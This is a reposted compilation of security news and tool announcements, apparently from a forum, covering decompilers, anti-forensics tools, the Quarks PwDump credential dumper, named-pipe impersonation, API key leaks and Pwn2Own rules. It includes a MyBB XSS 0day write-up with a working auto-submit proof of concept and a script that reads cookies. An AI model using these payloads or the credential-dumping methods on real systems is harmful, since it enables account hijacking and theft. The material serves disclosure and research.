[h=1]SmartDec[/h] Native code to C/C++ decompiler. [h=2]Standalone[/h] Supports x86 and x86-64 architectures. Reads ELF and PE file formats. Reconstructs functions, their names and arguments, local and global variables, expressions, integer, pointer and structural types, all types of control-flow structures, including switch. Has a nice graphical user interface with one-click navigation between assembler code and reconstructed program. The only decompiler that handles 64-bit code. [h=2]IDA Pro plug-in[/h] Enjoys all executable file formats supported by the disassembler. Benefits from IDA's signature search, parsers of debug information, and demanglers. Push-button decompilation of a chosen function or the whole program. Easy jumping between the disassembler and the decompiled code. Full GUI integration. Sursa: SmartDec | derevenets.com
-
Programmer for CC2538 backdoor UART bootloader [h=1]CC2538-prog[/h] CC2538-prog is a command line application to communicate with the CC2538 ROM bootloader. Copyright © 2014, Toby Jaffey <toby@1248.io> Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. [h=1]Instructions[/h] To use cc2538-prog, the chip must first be configured to enable the backdoor UART bootloader. The boards in the CC2538DK are preconfigured with the PER firmware which disable the backdoor UART bootloader. To enable it, we need to rewrite this flash. CC2538 Bootloader Backdoor - Texas Instruments Wiki The simplest way to do this is to flash the supplied file firmware/cc2538dk-contiki-demo.hex with the Windows Flash Programmer tool or Uniflash for Linux. To use the backdoor UART bootloader, your firmware must apply the change from the above link to startup_gcc.c (remove BOOTLOADER_BACKDOOR_DISABLE). This change is present in cc2538dk-contiki-demo.hex If successful, you should see a flashing LED. From now on, you may enable the bootloader at any time by removing the jumper on the SmartRF06 for RF2.6. Removing the jumper and pressing the EM RESET button will start the bootloader. Firmware may then be loaded with cc2538-prog. Once the firmware is loaded, the bootloader must be disabled before reset, by replacing the RF2.6 jumper. Sursa: https://github.com/1248/cc2538-prog
-
ADD is a physical memory anti-analysis tool designed to pollute memory with fake artifacts. This tool was first presented at Shmoocon 2014. Please note that this is a proof of concept tool. It forges OS objects in memory (poorly). It would be easy (very easy) to beat with better tool development. The tools would only need to provide better sanity checks of objects discovered during scanning. In that case, further development on ADD would be needed to beat new versions of forensics tools. The tool currently works only against Windows 7 SP1 x86. Huge portions of the driver code were based on the Windows DDK Sioctl driver code sample(because honestly, who wants to build device manager PnP code?). Haven't started source code versioning yet, just wanted to get the code out there so people can play with it. Started a Google code project for this before I remembered they restricted downloads on new projects (I guess all downloads are disabled now). FYI, there are places I don't do error checking where "real" programmers probably would. I'd like to point out that this is a PROOF OF CONCEPT tool. I don't think I'd run it on a target system without further testing and code auditing. Load the driver on a production system at your own risk. I haven't had any bugchecks with it yet, but YMMV. Driver: http://www.mediafire.com/download/v4jop3qois3gv4t/add-driver.zip User Agent: http://www.mediafire.com/download/see7o8rtnuwstp9/ADD_File.zip Reference Memory Image (with faked artifacts): http://www.mediafire.com/download/vvb0dbg2g2h1ukm/ADD-ref-image.zip Shmoocon Slides: ADD_Shmoocon Sursa: https://code.google.com/p/attention-deficit-disorder/
-
Facebook has powerful toys - a new "cold" storage technology of just 1 petabyte Published by Andrei Avădănei in Developers · News on 2 Feb, 2014 at 3:22 pm Facebook is probably one of the companies that holds the most information about, broadly speaking, everything we do, both on the social network itself and on related sites - those that embed a Facebook plugin, for example. This mass of information sits somewhere far back in our profiles and, most of the time, consists of data the social network rarely needs. Facebook has therefore been trying to develop "cold storage" technologies, and its latest result is a prototype that stores data on Blu-ray discs. Jay Parikh, a vice president at Facebook, explained at the Open Compute Summit how this cold storage prototype could help the social network free up vital space on its servers. In short, the new system uses 10,000 Blu-ray discs at the same time to store 1 petabyte of data. Full article: Facebook are jucării puternice - o nouă tehnologie de stocare la "rece" de doar 1 petabyte | WORLDIT
-
Arch Linux 2014.02.01 Is Now Available for Download February 2nd, 2014, 11:46 GMT · By Marius Nestor I can't believe that it's already February, and that another ISO image of the powerful Arch Linux distribution has been announced yesterday, as expected, on its official website. Unfortunately for some of you, Arch Linux is still not using the recently released Linux kernel 3.13. As such, Arch Linux 2014.02.01 is powered by Linux kernel 3.12.9, which is also the latest stable release of the upstream Linux 3.12 kernel series. Additionally, Arch Linux 2014.02.01 includes all the updated packages that were released during the past month, January 2014. As usual, existing Arch Linux users don’t need this new ISO image, as it's only intended for those of you who want to install Arch Linux on new machines. Arch Linux is a rolling-release Linux operating system, so in order to keep your Arch system up-to-date, use the sudo pacman -Syu or yaourt -Syua commands. Download Arch Linux 2014.02.01 right now from Softpedia. Follow @mariusnestor Sursa: Arch Linux 2014.02.01 Is Now Available for Download
-
[h=3]Namedpipe Impersonation Attack[/h] Privilege escalation through namedpipe impersonation attack was a real issue back in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identify of SYSTEM. We haven't heard a lot about this topic since then, is it still an issue? First of all, let's talk about the problem. When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish. For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over. Fortunately, Microsoft implemented and recently documented some restrictions and tools to help you manage the risk. First of all there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. They are called the "Security Quality Of Service". There are 4 flags to define the impersonation level allowed. SECURITY_ANONYMOUS The server process cannot obtain identification information about the client, and it cannot impersonate the client. SECURITY_IDENTIFICATION The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read. SECURITY_IMPERSONATION - This is the default The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems. SECURITY_DELEGATION The server process can impersonate the client's security context on remote systems. There are also 2 other flags: SECURITY_CONTEXT_TRACKING Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server process are on the same system. SECURITY_EFFECTIVE_ONLY Prevents a server from enabling or disabling a client's privilege or group while the server is impersonating. Note: Since the MSDN documentation for these flags is really weak, I used the definition that can be found in the book "Microsoft® Windows® Internals, Fourth Edition" by Mark Russinovich and David Solomon. Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored. Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozen of software running on my machine right now opening pipes without using the SQOS flags. 
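To illustrate what passing those flags looks like, here is an untested sketch using Python's ctypes; the pipe name is only an example, and a client that merely needs to be identified (never impersonated) would open the pipe with SECURITY_SQOS_PRESENT combined with SECURITY_IDENTIFICATION:

import ctypes
from ctypes import wintypes

GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
SECURITY_SQOS_PRESENT   = 0x00100000   # without this flag, the SQOS flags below are ignored
SECURITY_IDENTIFICATION = 0x00010000   # server may read our token but cannot act as us

CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
                       wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
                       wintypes.HANDLE]
CreateFile.restype = wintypes.HANDLE

handle = CreateFile(r"\\.\pipe\com_1",             # example pipe name
                    GENERIC_READ | GENERIC_WRITE,
                    0, None, OPEN_EXISTING,
                    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
                    None)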
To "fix" that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited. A server can impersonate a client only if one of the following is true. The caller has the SeImpersonatePrivilege privilege. The requested impersonation level is SecurityIdentification or SecurityAnonymous. The identity of the client is the same as the server. The token of the client was created using LogonUser from inside the same logon session as the server. Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems. The requested impersonation level in our case is SecurityImpersonation, so the second point does not apply. That leaves us with the last two conditions. Should we worry about them? I think so. Here are some examples: I'm on XP. I want to run an untrusted application. Since I read my old posts, I know that I can run the process using a stripped down version of my token. Unfortunately, my restricted token has the same identity as the normal token. It can then try to exploit all applications running on my desktop. This is bad. My main account is not administrator on the machine. When I want to install software, I use RunAs. This brings up a new problem. RunAs uses LogonUser, and it is called from the same logon session! That means that my untrusted application using a restricted token derived from a standard user token can now try to exploit and impersonate a process running with administrator rights! This is worse. But how real is all this? This is hard to say. I don't have an idea about the percentage of applications using the SQOS flags. We must not forget that allowing impersonation is also required and desired in certain cases. For fun I took the first application using namedpipes that came to my mind: Windbg. There is an option in Windbg to do kernel debugging and if the OS you are debugging is inside vmware, you can specify the namedpipe corresponding the COM1 port of the vmware image. By default it is "com_1". My untrusted application running with the restricted token was now listening on com_1, and, easy enough, as soon as I started windbg, the untrusted application was able to steal its token. To be fair I have to say that vmware displayed an error message telling me that the com_1 port was "not configured as expected". I should not have started windbg knowing that. But, eh, who reads error messages? What should we do now? Well, it turns out that Microsoft implemented two new restrictions in windows Vista to fix these problems. I don't think they are documented yet. If the token of a server is restricted, it can impersonate only clients also running with a restricted token. The server cannot impersonate a client running at a higher integrity level. These new restrictions are fixing both my issues. First of all my untrusted application can't be running with a restricted token anymore. Then, even if the untrusted application is running with my standard token, it won't be able to impersonate the processes that I start with the "Run As Administrator" elevation prompt because they are running with a High Integrity Level. Now it is time to come back to the main question: Is it still an issue? My answer is yes. Windows XP is still the most popular Windows version out there and there is no sign that Vista is going to catch up soon. But I have to admit that I'm relieved to see the light at the end of the tunnel! 
-- Some technical details: When you call ImpersonateNamedPipeClient and none of the conditions is met, the function still succeeds, but the impersonation level of the token is SecurityIdentification. If you want to try for yourself, you can find the code to create a server pipe and a client pipe on my code page. Related link: Impersonation isn't dangerous by David Leblanc Posted by nsylvain at 4:54 PM Sursa: The Final Stream: Namedpipe Impersonation Attack
-
MRG Effitas automatic XOR decryptor tool Posted by Zoltan Balazs on February 1, 2014 in Latest | 0 comments Malware writers tend to protect their binaries and configuration files with XOR encryption. Luckily, they never heard about the one-time-pad requirement, which requires "never reuse the XOR key". Binary files usually have long sequences of null bytes, which means the short XOR key (4 ASCII characters in most cases) used by the malware writers can be spotted in the binary as a recurring pattern. This Python script (tested and developed on Python 3.3) can find these recurring patterns at the beginning of the XOR encrypted binary, calculate the correct "offset" of the key, use this XOR key to decrypt the encrypted file, and check the result for known strings. The tool was able to find the correct XOR key in 90% of the cases; in the other cases, fine-tuning the default parameters can help. We used this tool to decrypt the XOR encrypted binaries found in network dumps, for example when exploit kits (e.g. Neutrino) were able to infect the victim and the payload was delivered to the victim as a XOR encrypted binary. For a list of parameters, run # python auto_xor_decryptor.py -h The tool is released under the GPLv3 licence. The script can be found on our Github account: https://github.com/MRGEffitas/scripts/blob/master/auto_xor_decryptor.py An example run of the tool looks like the following: c:\python33\python auto_xor_decryptor.py --input malware\48_.mp3 Auto XOR decryptor by MRG Effitas. Developed and tested on Python 3.3! This tool can automatically find short XOR keys in a XOR encrypted binary file, and use that to decrypt the XOR encrypted binary. Most parameters are good on default but if it is not working for you, you might try to fine-tune those. XOR key: b'626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b6862' XOR key ascii: b'bjkh' XOR key hex: b'626a6b68' Offset: 1 Final XOR key: b'jkhb' Great success! input read from : malware\48_.mp3, output written to : decrypted MRG Effitas Team Sursa: Publishing of MRG Effitas automatic XOR decryptor tool | MRG Effitas
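To make the underlying idea concrete, here is a simplified sketch of the approach (not the tool's actual implementation): recover the recurring chunk left by the null-byte runs, then try its rotations until the output looks like a PE file.

from collections import Counter

def guess_xor_key(data, key_len=4, sample=4096):
    # The most common key_len-sized chunk near the start of the file: with a
    # short repeating key XORed over long null runs, that chunk is the key itself.
    chunks = [bytes(data[i:i + key_len])
              for i in range(0, min(sample, len(data)) - key_len, key_len)]
    return Counter(chunks).most_common(1)[0][0]

def xor_decrypt(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decrypt_with_offset(data, key):
    # Try every rotation ("offset") of the guessed key and keep the one that
    # produces a plausible PE header.
    for off in range(len(key)):
        rotated = key[off:] + key[:off]
        plain = xor_decrypt(data, rotated)
        if plain.startswith(b"MZ"):
            return rotated, plain
    return None, None

data = open(r"malware\48_.mp3", "rb").read()
key, decrypted = decrypt_with_offset(data, guess_xor_key(data))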
-
A Field Study of Run-Time Location Access Disclosures on Android Smartphones Huiqing Fu, Yulong Yang, Nileema Shingte, Janne Lindqvist, Marco Gruteser Rutgers University Please contact janne@winlab.rutgers.edu for any inquiries Abstract—Smartphone users are increasingly using apps that can access their location. Often these accesses can be without users knowledge and consent. For example, recent research has shown that installation-time capability disclosures are ineffective in informing people about their apps’ location access. In this paper, we present a four-week field study (N=22) on run-time location access disclosures. Towards this end, we implemented a novel method to disclose location accesses by location-enabled apps on participants’ smartphones. In particular, the method did not need any changes to participants’ phones beyond installing our study app. We randomly divided our participants to two groups: a Disclosure group (N=13), who received our disclosures and a No Disclosure group (N=9) who received no disclosures from us. Our results confirm that the Android platform’s location access disclosure method does not inform participants effectively. Almost all participants pointed out that their location was accessed by several apps they would have not expected to access their location. Further, several apps accessed their location more frequently than they expected. We conclude that our participants appreciated the transparency brought by our run-time disclosures and that because of the disclosures most of them had taken actions to manage their apps’ location access. Download: http://www.winlab.rutgers.edu/~janne/USECfieldstudy.pdf
-
[h=1]Dementia[/h]Dementia is a proof of concept memory anti-forensic toolkit designed to hide various artifacts inside the memory dump during memory acquisition on the Microsoft Windows operating system. It works by exploiting memory acquisition tools and hiding operating system artifacts (e.g. processes, threads, etc.) from analysis applications such as Volatility, Memoryze and others. Because of flaws in some of the memory acquisition tools, Dementia can also hide operating system objects from the analysis tools entirely from user mode. For further details about Dementia, check the 29c3 presentation (PDF or video below). Downloads Defeating Windows memory forensics.pdf Dementia-1.0-x64.zip Dementia-1.0.zip Sursa: https://code.google.com/p/dementia-forensics/
-
Quarks PwDump Mon 14 May 2012 By Sébastien Kaczmarek Quarks PwDump is new open source tool to dump various types of Windows credentials: local account, domain accounts, cached domain credentials and bitlocker. The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges and is still in beta test. Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems. It currently extracts : Local accounts NT/LM hashes + history Domain accounts NT/LM hashes + history stored in NTDS.dit file Cached domain credentials Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit JOHN and LC format are handled. Supported OS are Windows XP / 2003 / Vista / 7 / 2008 / 8 Why another pwdump-like dumper tool? No tools can actually dump all kind of hash and bitlocker information at the same time, a combination of tools is always needed. Libesedb (http://sourceforge.net/projects/libesedb/) library encounters some rare crashs when parsing different NTDS.dit files. It's safer to directly use Microsoft JET/ESE API to parse databases originally built with same functions. Bitlocker case has been added even if some specific Microsoft tools could be used to dump those information. (Active Directory addons or VBS scripts) The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges. We plan to make it work full offline, for example on a disk image. How does it internally work? Case #1: Domain accounts hashes are extracted offline from NTDS.dit It's not currently full offline dump cause Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET databases parsing) which differs between Windows versions. For example, it's not possible to parse Win 2008 NTDS.dit file from XP. In fact, record's checksum are computed in a different manner and database files appear corrupted for API functions. That's currently the main drawback of the tool, everything should be done on domain controller. However no code injection or service installation are made and it's possible to securely copy NTDS.dit file by the use of Microsoft VSS (Volume Shadow Copy Service). Case #2: Bitlocker information dump It's possible to retrieve interesting information from ActiveDirectory if some specific GPO have been applied by domain administrators (mainly "Turn on BitLocker backup to Active Directory" in group policy). Recovery password: it's a 48-digits passphrase which allow a user to mount its partition even if its password has been lost. This password can be used in Bitlocker recovery console. Key Package : it's a binary keyfile which allow an user to decipher data on a damaged disk or partition. It can be used with Microsoft tools, especially Bitlocker Repair Tool. For each entry found in NTDS.dit, Quarks PwDump show recovery password to STDOUT and keyfiles (key packages) are stored to separate files for each recovery GUID: {GUID_1}.pk, {GUID_2}.pk,... Volume GUID: an unique value for each BitLocker-encrypted volume. Recovery GUID: recovery password identifier, it could be the same for different encrypted volumes. Quarks PwDump does no retrieve TPM information yet. When ownership of the TPM is taken as part of turning on BitLocker, a hash of the ownership password can be taken and stored in AD directory service. 
This information can then be used to reset ownership of the TPM. This feature will be added in a further release. In an enterprise environment, those GPOs should often be applied to ensure administrators can unlock a protected volume and employers can read specific files following an incident (an intrusion or various malicious acts, for example). Case #3: Local account and cached domain credentials There isn't anything really new here; a lot of tools already dump them without any problems. However, we have chosen an uncommon way to dump them, and only a few tools use this technique. Hashes are extracted live from the SAM and SECURITY hives in a proper way without code injection or service installation. In fact, we use the native registry API, especially the RegSaveKey() and RegLoadKey() functions, which require the SeBackup and SeRestore privileges. Next we mount the SAM/REGISTRY hives on a different mount point and change all key ACLs in order to extend access to the Administrators group and not LocalSystem only. That's why we chose to work on a backup, to preserve system integrity. Writing this tool was not a really difficult challenge; the storage of Windows hashes and BitLocker information is mostly well documented. However, it's an interesting project to understand Microsoft's strange implementation choices for each kind of storage: High-level obfuscation techniques are used for local and domain account hashes: many constants, atypical registry value names, a useless ciphering layer, hidden constants stored in the registry Class attribute, ... However, it can be easily defeated. The algorithms used sometimes differ between Windows versions, and the overall credential storage approach isn't consistent. The full list: RC4, MD5, MD4, SHA-256, AES-256, AES-128 and DES. BitLocker information is stored in cleartext in AD domain services. The project is still in beta and we would really appreciate feedback or suggestions/comments about potential bugs. Binary and source code are available on GitHub (GNU GPL v3 license): Quarks PwDump v0.1b: https://github.com/quarkslab/quarkspwdump For NTDS parsing technical details, you can also refer to the MISC MAG #59 article by Thibault Leveslin. Finally, we would like to thank the authors of NTDS hash dump (Csaba Barta), libesedb and creddump for their excellent work. Sursa: Quarks PwDump
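As an aside, the hive-backup step described in Case #3 can be approximated from an elevated prompt in a couple of lines; this is only an illustration of the RegSaveKey-based idea (reg.exe's save verb relies on the same API), not how Quarks PwDump itself is invoked:

import subprocess

# Requires an elevated prompt with the SeBackupPrivilege available.
for hive in ("SAM", "SECURITY"):
    subprocess.run(["reg", "save", "HKLM\\" + hive, hive + ".hiv", "/y"],
                   check=True)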
-
Accidental API Key Exposure is a Major Problem This article, about how a security researcher managed to gain access to Prezi's source code by using credentials he found in a public BitBucket repo, became very popular recently. The author concludes his article by saying "Please be aware of what you put up on github/bitbucket." Accidentally posting API keys, as well as passwords and other sensitive information, on public source control repositories is a huge problem. It potentially allows anybody who comes across your code to access data, send communications, or even make purchases on your behalf. And yet API keys exposed in public GitHub repos is a common occurrence. As somebody who has accidentally posted private credentials on GitHub in the past myself, before quickly noticing and taking them down, I was interested to see how widespread the problem of inadvertently publishing private credentials is. I did a quick GitHub search for Twilio auth tokens and was alarmed at the results that were returned. (I had no reason in particular for choosing Twilio tokens over any other API tokens; I'm sure every major API provider is affected.) Combining that search with a simple Ruby script wrapping a regular expression, I was able to discover 187 Twilio auth tokens in a matter of minutes. One hundred and eighty seven. Sitting there waiting to be discovered by a GitHub search. And GitHub would only display the first 1000 results out of around 20,000. But this is just scratching the surface. When people realise that their API credentials are visible on a public repository, their first instinct is, as it should be, to remove them. But the problem is, removing the tokens and committing the result is not enough. While they will no longer appear in a GitHub code search, any sufficiently motivated person can scroll back through your repository's history on GitHub, and find your code containing your tokens, just as it was before you "removed" them. But, especially for side-projects or for casual GitHub users who might not yet fully understand the purpose or features of Git, this potential vulnerability may not be obvious - I have seen more than one person make the mistake of leaving API keys or passwords in their Git history. So what can we do about this? Replace sensitive information with placeholders If you aren't using Git for managing a project, and just want to throw it up on GitHub so you can share your code, the solution is simple: you can just remove your sensitive passwords from the code and replace them with an empty string or “<api key here>” or some other placeholder. But when you're actually using source control for managing your project, this solution starts to fall apart. You need another way of keeping your credentials out of your repository. Storing sensitive information outside of source control Some common methods of storing sensitive information that won't show up in your repository are: Environment variables - these have the added advantage of making it easy to have different API keys or passwords for different environments your application may be deployed on (like development, staging and production for a web app). Config files that are kept out of version control - these are typically JSON or YAML files that contain any sensitive information, like API keys or passwords, that should not be publicly available. Your application can then just import this file and access all of the information it needs. 
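As a minimal illustration of both ideas (the TWILIO_AUTH_TOKEN name and config.json path are just examples), a lookup that prefers the environment and falls back to a git-ignored config file might look like this:

import json
import os

def get_secret(name, config_path="config.json"):
    # Environment variable first, then a git-ignored JSON config file.
    value = os.environ.get(name)
    if value:
        return value
    try:
        with open(config_path) as f:
            return json.load(f)[name]
    except (FileNotFoundError, KeyError):
        raise RuntimeError("missing credential: " + name)

token = get_secret("TWILIO_AUTH_TOKEN")

The important part is that config.json is listed in .gitignore, so the real value never reaches the repository.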
Depending on your programming language of choice, there may be libraries available to help you with this, like nconf for Node.js, or any of these RubyGems. Removing sensitive information that's already in your repository As stated above, the history features of version control systems mean that simply removing the tokens and then committing the result is not enough. If you can, you might want to consider revoking the keys that have been made public, so that anybody who may have discovered them already will be prevented from using them. If not, your only option is to rewrite your entire commit history since the API keys were added. If you are using git, this is possible with the git-filter-branch command. GitHub has a good tutorial on it that details specifically the problem of removing sensitive data from a Git repository. Please be aware that this can cause problems if there are multiple collaborators on your project, as each collaborator will have to rebase their changes to be on top of yours. Accidental API key exposure is one of those problems that is easy to avoid as long as you keep it in mind from the beginning of a project, but once you've slipped up, it becomes very difficult to fix. By keeping the dangers in mind, and making sure you're always keeping your API keys, passwords, and any other sensitive information out of version control from the beginning, you're protecting yourself from a very real and very severe threat to the security of both you and your users. Sursa: Accidental API Key Exposure is a Major Problem | Ross Penman
-
MyBB 1.6.12 POST XSS 0day This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was the input given. <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload MyBB throws out a SQL error: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%') This made me analyze and reverse this to find the cause. After filtering out, this was the correct input which can cause this error. This part should be the constant or'("\ To reproduce this issue you can add any char value in front of or'("\ and 2 char values after or'("\, and you cannot have any spaces in between them. This will be the skeleton: [1 char value]or'("\[2 char values] Examples: 1or'("\00 qor'("\2a You can have a space like this qor'("\ a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%') How to Inject JavaScript and HTML? We can inject HTML + JavaScript, but search.php filters out ' " [] - characters. This is the method you could use to inject your payload. If we put our constant in the middle we can inject our payload in front of and after it. If we inject it at the beginning of the constant the payload will be stored in this manner. [B]<Payload here>[/B]qor'("\2a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<Payload Here>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') For example if we inject an HTML header at the beginning [B]<h1>Osanda</h1>[/B]qor'("\2a It will look like this inside the source: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<h1>Osanda</h1>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') Now if we inject at the end of the constant, our payload will be stored in two places like this in the source. qor'("\2a[B]<Payload Here>[/B] The payload is thrown out in the SQL error itself. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3 The second place is inside the query. SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a[B]<payload here>%[/B]') Example: This would be an example of JavaScript being interpreted: <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query. Remember, this filters out ' " [] - characters. Therefore we can use an external script source for performing further client side attacks.
Proof of Concept <html> <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2nd of 2014 Bug Discovered and Exploit Author: Osanda Malith Jayathissa Vendor Homepage: http://www.mybb.com Software Link: http://resources.mybb.com/downloads/mybb_1612.zip Version: 1.6.12 (older versions might be vulnerbale) Tested on: Windows 8 64-bit Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day --> <body> <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST"> <input type="hidden" name="action" value="do_search" /> <input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> POC Video You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this. <script src=poc />qor'("\2a</script> This will be containing in the poc file. document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie); alert('XSS by Osanda & HR'); Thanks to Hood3dRob1n for this idea I have no idea to inject SQL in this bug. You may give it a try and see. Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith
-
-
Pwn2Own 2014: Rules and Unicorns Brian Gorenc, Manager, Vulnerability Research, HP Security Research HP’s Zero Day Initiative is once again expanding the scope of its annual Pwn2Own contest, with a new competition that combines multiple vulnerabilities for a challenge of unprecedented difficulty and reward. Last year we launched a plug-in track to the competition, in addition to our traditional browser targets. We’ll continue both tracks this year. For 2014, we’re introducing a complex Grand Prize challenge with multiple components, including a bypass of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections – truly an Exploit Unicorn worthy of myth and legend, plus $150,000 to the researcher who can tame it (for additional background on this new category, see additional blog post here). Pwn2Own prize funds this year are expected to total over half a million dollars (USD) in cash and non-cash awards. As they did last year, our friends at Google are joining us in sponsoring all targets in the 2014 competition. Contest dates The contest will take place March 12-13 in Vancouver, British Columbia, at the CanSecWest 2014 conference. The schedule of contestants and platforms will be determined by random drawing at the conference venue and posted at Pwn2Own.com prior to the start of competition. Rules and prizes The 2014 competition consists of three divisions: Browsers, Plug-Ins, and the Grand Prize. All target machines will be running the latest fully patched versions of the relevant operating systems (Windows 8.1 x64 and OS X Mavericks), installed in their default configurations. The vulnerability or vulnerabilities used in each attack must be unknown and not previously reported to the vendor. A particular vulnerability can only be used once across all categories. The first contestant to successfully compromise a target within the 30-minute time limit wins the prize in that category. The 2014 targets are: Browsers: Google Chrome on Windows 8.1 x64: $100,000 Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000 Mozilla Firefox on Windows 8.1 x64: $50,000 Apple Safari on OS X Mavericks: $65,000 Plug-ins: Adobe Reader running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Adobe Flash running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Oracle Java running in Internet Explorer 11 on Windows 8.1 x64 (requires click-through bypass): $30,000 “Exploit Unicorn” Grand Prize: SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000* Please see the Pwn2Own 2014 rules for complete descriptions of the challenges. In particular, taming the Exploit Unicorn is a multi-step process, and competitors should be as familiar as possible with the necessary sequence of vulnerabilities required: The initial vulnerability utilized in the attack must be in the browser. The browser’s sandbox must be bypassed using a vulnerability in the sandbox. A separate privilege escalation vulnerability must be used to obtain SYSTEM-level arbitrary code execution on the target. The exploit must work when Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections are enabled. In addition to the cash prizes listed above, successful competitors will receive the laptop on which they demonstrate the compromise. They’ll also receive 20,000 ZDI reward points, which immediately qualifies them for Silver standing in the benefits program. 
(ZDI Silver standing includes a one-time $5,000 cash payout, a 15% monetary bonus on all vulnerabilities submitted to ZDI during the next calendar year, a 25% reward-point bonus on all vulnerabilities submitted to ZDI over the next calendar year, and paid travel and registration to attend the 2014 DEFCON conference in Las Vegas.) As ever, vulnerabilities and exploit techniques revealed by contest winners will be disclosed to the affected vendors, and the proof of concept will become the property of HP in accordance with the HP ZDI program. If the affected vendors wish to coordinate an onsite transfer at the conference venue, HP ZDI is able to accommodate that request. The full set of rules for Pwn2Own 2014 is available here. They may be changed at any time without notice. Registration Pre-registration is required to ensure we have sufficient resources on hand in Vancouver. Please contact ZDI at zdi@hp.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine contestant order. Registration closes at 5pm Pacific time on March 10, 2014. Follow the action Pwn2Own.com will be updated periodically with blogs, photos and videos between now and the competition, and in real time during the event. If it becomes necessary to hold a drawing to determine contestant order, we will also update the site in real time during that process. Follow us on Twitter at @thezdi, and keep an 